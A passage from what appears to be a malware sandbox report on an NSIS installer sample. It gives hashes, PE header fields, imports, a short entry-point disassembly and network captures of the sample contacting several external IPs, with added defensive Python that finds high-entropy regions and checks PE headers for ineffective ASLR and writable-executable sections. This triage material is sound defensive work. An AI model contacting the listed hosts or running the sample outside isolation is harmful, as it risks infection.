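    """Merge adjacent high-entropy windows into (start, end) byte ranges: this is where a
    compressed or encrypted payload sits inside an otherwise low-entropy container."""
    regions = []
    for off, h in windowed_entropy(data, window):
        if h < threshold:
            continue
        end = min(off + window, len(data))
        if regions and regions[-1][1] == off:
            regions[-1] = (regions[-1][0], end)   # extend the previous region
        else:
            regions.append((off, end))
    return regions


# Constructed stand-in for a self-extracting installer: plain stub, packed payload, plain trailer.
STUB = b"A" * 2048
PAYLOAD = bytes(range(256)) * 4        # every byte value equally often -> exactly 8.0 bits/byte
TRAILER = b"B" * 2048
SAMPLE = STUB + PAYLOAD + TRAILER

if __name__ == "__main__":
    print(f"whole file: {shannon_entropy(SAMPLE):.3f} bits/byte, "
          f"encrypted={looks_encrypted(SAMPLE)}")
    print("high-entropy regions:", high_entropy_regions(SAMPLE))
```

Run against a real sample the region list points at the offsets worth carving. Two caveats: well-compressed data scores as high as ciphertext, so "Encrypted:true" means "not plain", not "encrypted"; and a whole-file score averages the container with its payload, which is why the installer itself sits at 7.93 while its stub code section is only 6.4.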
                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                              Entropy (8bit):7.926593256630463
                                                              TrID:
                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                              • DOS Executable Generic (2002/1) 0.02%
                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                              File name:u8QPnVhq0N.exe
                                                              File size:299979
                                                              MD5:7de990046a20e6666627273589b014a5
                                                              SHA1:55ebccd35c2329c5816cd0240b0919651ac58321
                                                              SHA256:ebce15ad53b98d7aba7f7544ee947e88f58d696e22ca4bc5d15b2ded37b577ac
                                                              SHA512:850914621b366494bba2a64aef1b3df7c619c7e6bb321a67bc1a1a97bd0182118a1e5648ee48d24449e6341ab7f7989369797114fa521db8c26ccd5eb3386a42
                                                              SSDEEP:6144:PYa6J+5gUNIG+sCfq3V++iY3aub8kFiLGG9qFP2ipkHj3DR7gy7y:PYDghNESPX3ZZq9q1b6DRc
                                                              TLSH:B2542255E6DDC947D8624E306C7FCA25ABE6F9112D740A1B2320AF45B973240E90F3AF
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*.....
                                                              Icon Hash:b2a88c96b2ca6a72
                                                              Entrypoint:0x403640
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x614F9B1F [Sat Sep 25 21:56:47 2021 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:61259b55b8912888e90f516ca08dc514
                                                              Instruction
                                                              push ebp
                                                              mov ebp, esp
                                                              sub esp, 000003F4h
                                                              push ebx
                                                              push esi
                                                              push edi
                                                              push 00000020h
                                                              pop edi
                                                              xor ebx, ebx
                                                              push 00008001h
                                                              mov dword ptr [ebp-14h], ebx
                                                              mov dword ptr [ebp-04h], 0040A230h
                                                              mov dword ptr [ebp-10h], ebx
                                                              call dword ptr [004080C8h]
                                                              mov esi, dword ptr [004080CCh]
                                                              lea eax, dword ptr [ebp-00000140h]
                                                              push eax
                                                              mov dword ptr [ebp-0000012Ch], ebx
                                                              mov dword ptr [ebp-2Ch], ebx
                                                              mov dword ptr [ebp-28h], ebx
                                                              mov dword ptr [ebp-00000140h], 0000011Ch
                                                              call esi
                                                              test eax, eax
                                                              jne 00007F07D0BACB2Ah
                                                              lea eax, dword ptr [ebp-00000140h]
                                                              mov dword ptr [ebp-00000140h], 00000114h
                                                              push eax
                                                              call esi
                                                              mov ax, word ptr [ebp-0000012Ch]
                                                              mov ecx, dword ptr [ebp-00000112h]
                                                              sub ax, 00000053h
                                                              add ecx, FFFFFFD0h
                                                              neg ax
                                                              sbb eax, eax
                                                              mov byte ptr [ebp-26h], 00000004h
                                                              not eax
                                                              and eax, ecx
                                                              mov word ptr [ebp-2Ch], ax
                                                              cmp dword ptr [ebp-0000013Ch], 0Ah
                                                              jnc 00007F07D0BACAFAh
                                                              and word ptr [ebp-00000132h], 0000h
                                                              mov eax, dword ptr [ebp-00000134h]
                                                              movzx ecx, byte ptr [ebp-00000138h]
                                                              mov dword ptr [0042A318h], eax
                                                              xor eax, eax
                                                              mov ah, byte ptr [ebp-0000013Ch]
                                                              movzx eax, ax
                                                              or eax, ecx
                                                              xor ecx, ecx
                                                              mov ch, byte ptr [ebp-2Ch]
                                                              movzx ecx, cx
                                                              shl eax, 10h
                                                              or eax, ecx
                                                              Programming Language:
                                                              • [EXP] VC++ 6.0 SP5 build 8804
                                                               Name | Virtual Address | Virtual Size | Is in Section
                                                               IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                               IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8504 | 0xa0 | .rdata
                                                               IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3b000 | 0xce8 | .rsrc
                                                               IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                               IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                               IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                               IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                               IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                               IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                               IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                               IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                               IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                               IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
                                                               IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                               IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                               IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                               Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                               .text | 0x1000 | 0x6676 | 0x6800 | False | 0.6568134014423077 | data | 6.4174599871908855 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                               .rdata | 0x8000 | 0x139a | 0x1400 | False | 0.4498046875 | data | 5.141066817170598 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                               .data | 0xa000 | 0x20378 | 0x600 | False | 0.509765625 | data | 4.110582127654237 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                               .ndata | 0x2b000 | 0x10000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                               .rsrc | 0x3b000 | 0xce8 | 0xe00 | False | 0.42299107142857145 | data | 4.232621117991543 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
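Read together, the header fields above say something the individual rows do not: DLL Characteristics advertise DYNAMIC_BASE, but Image File Characteristics carry RELOCS_STRIPPED and IMAGE_DIRECTORY_ENTRY_BASERELOC is 0x0/0x0, so the loader has nothing to relocate the image with and it is mapped at its preferred Imagebase of 0x400000; ASLR is claimed, not delivered. No section is shipped writable and executable, which is consistent with the "changes PE section rights" signature being a runtime observation rather than a static one. The Python below is an added example, not code from the Joe Sandbox report: it constructs a minimal PE32 header carrying exactly the values listed above (the bytes are constructed, the field values copied from the summary), parses it back with the standard library, and runs the two checks a triager wants from a static header. A second, constructed sample with a .text section left RWX shows the section check firing.

```python
import struct

# IMAGE_FILE_HEADER.Characteristics
RELOCS_STRIPPED, EXECUTABLE_IMAGE = 0x0001, 0x0002
LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, MACHINE_32BIT = 0x0004, 0x0008, 0x0100
# IMAGE_OPTIONAL_HEADER.DllCharacteristics
DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE = 0x0040, 0x0100, 0x0400, 0x8000
# IMAGE_SECTION_HEADER.Characteristics
SCN_CNT_CODE, SCN_CNT_INITIALIZED_DATA = 0x00000020, 0x00000040
SCN_MEM_EXECUTE, SCN_MEM_READ, SCN_MEM_WRITE = 0x20000000, 0x40000000, 0x80000000
DIR_BASERELOC = 5            # index of the base relocation data directory


def build_pe32(file_chars, dll_chars, sections, reloc_dir=(0, 0), image_base=0x400000):
    """Constructed minimal PE32 header (no code, no real sections) so the checks run offline."""
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0xE0, file_chars)
    opt = struct.pack("<HBBIIIIII", 0x10B, 6, 0, 0, 0, 0, 0x1000, 0x1000, 0x2000)
    opt += struct.pack("<IIIHHHHHHIIIIHHIIIIII", image_base, 0x1000, 0x200, 4, 0, 0, 0, 4, 0,
                       0, 0x3000, 0x400, 0, 2, dll_chars, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    dirs = [(0, 0)] * 16
    dirs[DIR_BASERELOC] = reloc_dir
    opt += b"".join(struct.pack("<II", va, size) for va, size in dirs)
    sect = b"".join(struct.pack("<8sIIIIIIHHI", name.encode(), vsize, va, rsize, 0x400,
                                0, 0, 0, 0, chars) for name, va, vsize, rsize, chars in sections)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)      # e_lfanew = 0x40
    return dos + b"PE\0\0" + coff + opt + sect


def parse_pe32(blob):
    """Return just the header fields the checks below need."""
    if blob[:2] != b"MZ":
        raise ValueError("not an MZ file")
    pe = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[pe:pe + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    _, nsect, _, _, _, opt_size, file_chars = struct.unpack_from("<HHIIIHH", blob, pe + 4)
    opt = pe + 24
    if struct.unpack_from("<H", blob, opt)[0] != 0x10B:
        raise ValueError("only PE32 handled here")
    image_base = struct.unpack_from("<I", blob, opt + 28)[0]
    dll_chars = struct.unpack_from("<H", blob, opt + 70)[0]
    ndirs = struct.unpack_from("<I", blob, opt + 92)[0]
    reloc = (0, 0)
    if ndirs > DIR_BASERELOC:
        reloc = struct.unpack_from("<II", blob, opt + 96 + 8 * DIR_BASERELOC)
    sections, off = [], opt + opt_size
    for _ in range(nsect):
        name, vsize, va, rsize, *_rest, chars = struct.unpack_from("<8sIIIIIIHHI", blob, off)
        sections.append((name.rstrip(b"\0").decode(), va, vsize, rsize, chars))
        off += 40
    return {"image_base": image_base, "file_chars": file_chars, "dll_chars": dll_chars,
            "reloc_dir": reloc, "sections": sections}


def aslr_effective(h):
    """DYNAMIC_BASE only helps if the loader can actually relocate the image."""
    wants = bool(h["dll_chars"] & DYNAMIC_BASE)
    can = not (h["file_chars"] & RELOCS_STRIPPED) and h["reloc_dir"][1] > 0
    return wants and can


def writable_executable_sections(h):
    """Names of sections mapped both writable and executable (what an in-place unpacker needs)."""
    return [s[0] for s in h["sections"] if s[4] & SCN_MEM_WRITE and s[4] & SCN_MEM_EXECUTE]


# Field values copied from the static summary of u8QPnVhq0N.exe above; bytes are constructed.
NSIS_STUB = build_pe32(
    RELOCS_STRIPPED | EXECUTABLE_IMAGE | LINE_NUMS_STRIPPED | LOCAL_SYMS_STRIPPED | MACHINE_32BIT,
    DYNAMIC_BASE | NX_COMPAT | NO_SEH | TERMINAL_SERVER_AWARE,
    [(".text", 0x1000, 0x6676, 0x6800, SCN_CNT_CODE | SCN_MEM_EXECUTE | SCN_MEM_READ),
     (".rdata", 0x8000, 0x139A, 0x1400, SCN_CNT_INITIALIZED_DATA | SCN_MEM_READ),
     (".data", 0xA000, 0x20378, 0x600, SCN_CNT_INITIALIZED_DATA | SCN_MEM_READ | SCN_MEM_WRITE)])
# Constructed counter-example: relocations present, but .text shipped RWX.
RWX_SAMPLE = build_pe32(
    EXECUTABLE_IMAGE | MACHINE_32BIT, DYNAMIC_BASE | NX_COMPAT,
    [(".text", 0x1000, 0x1000, 0x1000, SCN_CNT_CODE | SCN_MEM_EXECUTE | SCN_MEM_READ | SCN_MEM_WRITE)],
    reloc_dir=(0x2000, 0x40))

if __name__ == "__main__":
    for label, blob in (("report values", NSIS_STUB), ("rwx sample", RWX_SAMPLE)):
        h = parse_pe32(blob)
        print(f"{label}: base=0x{h['image_base']:x} aslr_effective={aslr_effective(h)} "
              f"rwx={writable_executable_sections(h)}")
```

The static RWX check only catches images that ship that way; a stub that calls VirtualProtect on its own .text at runtime, which is what the report's "changes PE section rights" signature records, is invisible to it and needs the dynamic trace.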
                                                               Name | RVA | Size | Type | Language | Country
                                                               RT_ICON | 0x3b1d8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States
                                                               RT_DIALOG | 0x3b4c0 | 0x100 | data | English | United States
                                                               RT_DIALOG | 0x3b5c0 | 0x11c | data | English | United States
                                                               RT_DIALOG | 0x3b6e0 | 0x60 | data | English | United States
                                                               RT_GROUP_ICON | 0x3b740 | 0x14 | data | English | United States
                                                               RT_VERSION | 0x3b758 | 0x250 | data | English | United States
                                                               RT_MANIFEST | 0x3b9a8 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States
                                                               DLL | Import
                                                               ADVAPI32.dll | RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                               SHELL32.dll | SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                               ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                               COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                               USER32.dll | GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                               GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                               KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                                                               Language of compilation system | Country where language is spoken
                                                               English | United States
TCP Packets

Timestamp                           | Source Port | Dest Port | Source IP       | Dest IP
Mar 20, 2023 17:51:05.667118073 CET | 49698       | 80        | 192.168.2.5     | 94.176.104.86
Mar 20, 2023 17:51:05.704344034 CET | 80          | 49698     | 94.176.104.86   | 192.168.2.5
Mar 20, 2023 17:51:05.704581022 CET | 49698       | 80        | 192.168.2.5     | 94.176.104.86
Mar 20, 2023 17:51:05.712644100 CET | 49698       | 80        | 192.168.2.5     | 94.176.104.86
Mar 20, 2023 17:51:05.752857924 CET | 80          | 49698     | 94.176.104.86   | 192.168.2.5
Mar 20, 2023 17:51:05.980328083 CET | 80          | 49698     | 94.176.104.86   | 192.168.2.5
Mar 20, 2023 17:51:05.980354071 CET | 80          | 49698     | 94.176.104.86   | 192.168.2.5
Mar 20, 2023 17:51:05.980566025 CET | 49698       | 80        | 192.168.2.5     | 94.176.104.86
Mar 20, 2023 17:51:05.980846882 CET | 49698       | 80        | 192.168.2.5     | 94.176.104.86
Mar 20, 2023 17:51:06.017899036 CET | 80          | 49698     | 94.176.104.86   | 192.168.2.5
Mar 20, 2023 17:51:11.020831108 CET | 49699       | 80        | 192.168.2.5     | 78.141.192.145
Mar 20, 2023 17:51:11.048405886 CET | 80          | 49699     | 78.141.192.145  | 192.168.2.5
Mar 20, 2023 17:51:11.048645020 CET | 49699       | 80        | 192.168.2.5     | 78.141.192.145
Mar 20, 2023 17:51:11.048825026 CET | 49699       | 80        | 192.168.2.5     | 78.141.192.145
Mar 20, 2023 17:51:11.076636076 CET | 80          | 49699     | 78.141.192.145  | 192.168.2.5
Mar 20, 2023 17:51:11.076663017 CET | 80          | 49699     | 78.141.192.145  | 192.168.2.5
Mar 20, 2023 17:51:11.076689005 CET | 80          | 49699     | 78.141.192.145  | 192.168.2.5
Mar 20, 2023 17:51:11.076894999 CET | 49699       | 80        | 192.168.2.5     | 78.141.192.145
Mar 20, 2023 17:51:12.550728083 CET | 49699       | 80        | 192.168.2.5     | 78.141.192.145
Mar 20, 2023 17:51:13.566399097 CET | 49700       | 80        | 192.168.2.5     | 78.141.192.145
Mar 20, 2023 17:51:13.594280005 CET | 80          | 49700     | 78.141.192.145  | 192.168.2.5
Mar 20, 2023 17:51:13.594413996 CET | 49700       | 80        | 192.168.2.5     | 78.141.192.145
Mar 20, 2023 17:51:13.594569921 CET | 49700       | 80        | 192.168.2.5     | 78.141.192.145
Mar 20, 2023 17:51:13.621995926 CET | 80          | 49700     | 78.141.192.145  | 192.168.2.5
Mar 20, 2023 17:51:13.622102022 CET | 80          | 49700     | 78.141.192.145  | 192.168.2.5
Mar 20, 2023 17:51:13.622251987 CET | 80          | 49700     | 78.141.192.145  | 192.168.2.5
Mar 20, 2023 17:51:13.622320890 CET | 49700       | 80        | 192.168.2.5     | 78.141.192.145
Mar 20, 2023 17:51:13.628089905 CET | 49700       | 80        | 192.168.2.5     | 78.141.192.145
Mar 20, 2023 17:51:13.657012939 CET | 80          | 49700     | 78.141.192.145  | 192.168.2.5
Mar 20, 2023 17:51:18.720860004 CET | 49702       | 80        | 192.168.2.5     | 161.97.163.8
Mar 20, 2023 17:51:18.747663975 CET | 80          | 49702     | 161.97.163.8    | 192.168.2.5
Mar 20, 2023 17:51:18.747811079 CET | 49702       | 80        | 192.168.2.5     | 161.97.163.8
Mar 20, 2023 17:51:18.747998953 CET | 49702       | 80        | 192.168.2.5     | 161.97.163.8
Mar 20, 2023 17:51:18.774467945 CET | 80          | 49702     | 161.97.163.8    | 192.168.2.5
Mar 20, 2023 17:51:18.775655985 CET | 80          | 49702     | 161.97.163.8    | 192.168.2.5
Mar 20, 2023 17:51:18.775684118 CET | 80          | 49702     | 161.97.163.8    | 192.168.2.5
Mar 20, 2023 17:51:18.775814056 CET | 49702       | 80        | 192.168.2.5     | 161.97.163.8
Mar 20, 2023 17:51:20.257500887 CET | 49702       | 80        | 192.168.2.5     | 161.97.163.8
Mar 20, 2023 17:51:21.286931038 CET | 49703       | 80        | 192.168.2.5     | 161.97.163.8
Mar 20, 2023 17:51:21.314835072 CET | 80          | 49703     | 161.97.163.8    | 192.168.2.5
Mar 20, 2023 17:51:21.315018892 CET | 49703       | 80        | 192.168.2.5     | 161.97.163.8
Mar 20, 2023 17:51:21.315146923 CET | 49703       | 80        | 192.168.2.5     | 161.97.163.8
Mar 20, 2023 17:51:21.342814922 CET | 80          | 49703     | 161.97.163.8    | 192.168.2.5
Mar 20, 2023 17:51:21.343677998 CET | 80          | 49703     | 161.97.163.8    | 192.168.2.5
Mar 20, 2023 17:51:21.343713999 CET | 80          | 49703     | 161.97.163.8    | 192.168.2.5
Mar 20, 2023 17:51:21.343878984 CET | 49703       | 80        | 192.168.2.5     | 161.97.163.8
Mar 20, 2023 17:51:21.344151020 CET | 49703       | 80        | 192.168.2.5     | 161.97.163.8
Mar 20, 2023 17:51:21.370907068 CET | 80          | 49703     | 161.97.163.8    | 192.168.2.5
Mar 20, 2023 17:51:26.427524090 CET | 49704       | 80        | 192.168.2.5     | 91.195.240.94
Mar 20, 2023 17:51:26.446513891 CET | 80          | 49704     | 91.195.240.94   | 192.168.2.5
Mar 20, 2023 17:51:26.448134899 CET | 49704       | 80        | 192.168.2.5     | 91.195.240.94
Mar 20, 2023 17:51:26.448251963 CET | 49704       | 80        | 192.168.2.5     | 91.195.240.94
Mar 20, 2023 17:51:26.468321085 CET | 80          | 49704     | 91.195.240.94   | 192.168.2.5
Mar 20, 2023 17:51:26.468364954 CET | 80          | 49704     | 91.195.240.94   | 192.168.2.5
Mar 20, 2023 17:51:26.468543053 CET | 49704       | 80        | 192.168.2.5     | 91.195.240.94
Mar 20, 2023 17:51:27.964165926 CET | 49704       | 80        | 192.168.2.5     | 91.195.240.94
Mar 20, 2023 17:51:28.974808931 CET | 49705       | 80        | 192.168.2.5     | 91.195.240.94
Mar 20, 2023 17:51:28.994070053 CET | 80          | 49705     | 91.195.240.94   | 192.168.2.5
Mar 20, 2023 17:51:28.994333029 CET | 49705       | 80        | 192.168.2.5     | 91.195.240.94
Mar 20, 2023 17:51:28.994477987 CET | 49705       | 80        | 192.168.2.5     | 91.195.240.94
Mar 20, 2023 17:51:29.054166079 CET | 80          | 49705     | 91.195.240.94   | 192.168.2.5
Mar 20, 2023 17:51:29.079484940 CET | 80          | 49705     | 91.195.240.94   | 192.168.2.5
Mar 20, 2023 17:51:29.079541922 CET | 80          | 49705     | 91.195.240.94   | 192.168.2.5
Mar 20, 2023 17:51:29.079590082 CET | 80          | 49705     | 91.195.240.94   | 192.168.2.5
Mar 20, 2023 17:51:29.079637051 CET | 80          | 49705     | 91.195.240.94   | 192.168.2.5
Mar 20, 2023 17:51:29.079684973 CET | 80          | 49705     | 91.195.240.94   | 192.168.2.5
Mar 20, 2023 17:51:29.079731941 CET | 80          | 49705     | 91.195.240.94   | 192.168.2.5
Mar 20, 2023 17:51:29.079747915 CET | 49705       | 80        | 192.168.2.5     | 91.195.240.94
Mar 20, 2023 17:51:29.079782963 CET | 80          | 49705     | 91.195.240.94   | 192.168.2.5
Mar 20, 2023 17:51:29.079797983 CET | 49705       | 80        | 192.168.2.5     | 91.195.240.94
Mar 20, 2023 17:51:29.079828978 CET | 80          | 49705     | 91.195.240.94   | 192.168.2.5
Mar 20, 2023 17:51:29.079874992 CET | 80          | 49705     | 91.195.240.94   | 192.168.2.5
Mar 20, 2023 17:51:29.079876900 CET | 49705       | 80        | 192.168.2.5     | 91.195.240.94
Mar 20, 2023 17:51:29.079921007 CET | 80          | 49705     | 91.195.240.94   | 192.168.2.5
Mar 20, 2023 17:51:29.079973936 CET | 49705       | 80        | 192.168.2.5     | 91.195.240.94
Mar 20, 2023 17:51:29.099098921 CET | 80          | 49705     | 91.195.240.94   | 192.168.2.5
Mar 20, 2023 17:51:29.099133015 CET | 80          | 49705     | 91.195.240.94   | 192.168.2.5
Mar 20, 2023 17:51:29.099155903 CET | 80          | 49705     | 91.195.240.94   | 192.168.2.5
Mar 20, 2023 17:51:29.099188089 CET | 80          | 49705     | 91.195.240.94   | 192.168.2.5
Mar 20, 2023 17:51:29.099210978 CET | 80          | 49705     | 91.195.240.94   | 192.168.2.5
Mar 20, 2023 17:51:29.099232912 CET | 80          | 49705     | 91.195.240.94   | 192.168.2.5
Mar 20, 2023 17:51:29.099253893 CET | 80          | 49705     | 91.195.240.94   | 192.168.2.5
Mar 20, 2023 17:51:29.099299908 CET | 49705       | 80        | 192.168.2.5     | 91.195.240.94
Mar 20, 2023 17:51:29.099364996 CET | 49705       | 80        | 192.168.2.5     | 91.195.240.94
Mar 20, 2023 17:51:29.100024939 CET | 80          | 49705     | 91.195.240.94   | 192.168.2.5
Mar 20, 2023 17:51:29.102252007 CET | 49705       | 80        | 192.168.2.5     | 91.195.240.94
Mar 20, 2023 17:51:29.102482080 CET | 49705       | 80        | 192.168.2.5     | 91.195.240.94
Mar 20, 2023 17:51:29.121347904 CET | 80          | 49705     | 91.195.240.94   | 192.168.2.5
Mar 20, 2023 17:51:34.198955059 CET | 49706       | 80        | 192.168.2.5     | 213.145.228.111
Mar 20, 2023 17:51:34.220103979 CET | 80          | 49706     | 213.145.228.111 | 192.168.2.5
Mar 20, 2023 17:51:34.220273018 CET | 49706       | 80        | 192.168.2.5     | 213.145.228.111
Mar 20, 2023 17:51:34.220527887 CET | 49706       | 80        | 192.168.2.5     | 213.145.228.111
Mar 20, 2023 17:51:34.241683006 CET | 80          | 49706     | 213.145.228.111 | 192.168.2.5
Mar 20, 2023 17:51:34.411031961 CET | 80          | 49706     | 213.145.228.111 | 192.168.2.5
Mar 20, 2023 17:51:34.411067963 CET | 80          | 49706     | 213.145.228.111 | 192.168.2.5
Mar 20, 2023 17:51:34.411088943 CET | 80          | 49706     | 213.145.228.111 | 192.168.2.5
Mar 20, 2023 17:51:34.411154032 CET | 49706       | 80        | 192.168.2.5     | 213.145.228.111
Mar 20, 2023 17:51:34.418124914 CET | 80          | 49706     | 213.145.228.111 | 192.168.2.5
Mar 20, 2023 17:51:34.418153048 CET | 80          | 49706     | 213.145.228.111 | 192.168.2.5
Mar 20, 2023 17:51:34.418204069 CET | 49706       | 80        | 192.168.2.5     | 213.145.228.111
UDP Packets

Timestamp                           | Source Port | Dest Port | Source IP   | Dest IP
Mar 20, 2023 17:51:05.616214037 CET | 50295       | 53        | 192.168.2.5 | 8.8.8.8
Mar 20, 2023 17:51:05.659106016 CET | 53          | 50295     | 8.8.8.8     | 192.168.2.5
Mar 20, 2023 17:51:10.996087074 CET | 60841       | 53        | 192.168.2.5 | 8.8.8.8
Mar 20, 2023 17:51:11.019247055 CET | 53          | 60841     | 8.8.8.8     | 192.168.2.5
Mar 20, 2023 17:51:18.648199081 CET | 60649       | 53        | 192.168.2.5 | 8.8.8.8
Mar 20, 2023 17:51:18.673597097 CET | 53          | 60649     | 8.8.8.8     | 192.168.2.5
Mar 20, 2023 17:51:26.386713982 CET | 51441       | 53        | 192.168.2.5 | 8.8.8.8
Mar 20, 2023 17:51:26.421905994 CET | 53          | 51441     | 8.8.8.8     | 192.168.2.5
Mar 20, 2023 17:51:34.164959908 CET | 49177       | 53        | 192.168.2.5 | 8.8.8.8
Mar 20, 2023 17:51:34.197314024 CET | 53          | 49177     | 8.8.8.8     | 192.168.2.5
Mar 20, 2023 17:51:42.216943026 CET | 49724       | 53        | 192.168.2.5 | 8.8.8.8
Mar 20, 2023 17:51:42.247035027 CET | 53          | 49724     | 8.8.8.8     | 192.168.2.5
Mar 20, 2023 17:51:49.884217978 CET | 61452       | 53        | 192.168.2.5 | 8.8.8.8
Mar 20, 2023 17:51:50.032006979 CET | 53          | 61452     | 8.8.8.8     | 192.168.2.5
Mar 20, 2023 17:51:58.059444904 CET | 65323       | 53        | 192.168.2.5 | 8.8.8.8
Mar 20, 2023 17:51:58.112246037 CET | 53          | 65323     | 8.8.8.8     | 192.168.2.5
Mar 20, 2023 17:52:06.919426918 CET | 51484       | 53        | 192.168.2.5 | 8.8.8.8
Mar 20, 2023 17:52:07.043114901 CET | 53          | 51484     | 8.8.8.8     | 192.168.2.5
Mar 20, 2023 17:52:16.333122969 CET | 63446       | 53        | 192.168.2.5 | 8.8.8.8
Mar 20, 2023 17:52:16.358932018 CET | 53          | 63446     | 8.8.8.8     | 192.168.2.5
Mar 20, 2023 17:52:17.446403027 CET | 56751       | 53        | 192.168.2.5 | 8.8.8.8
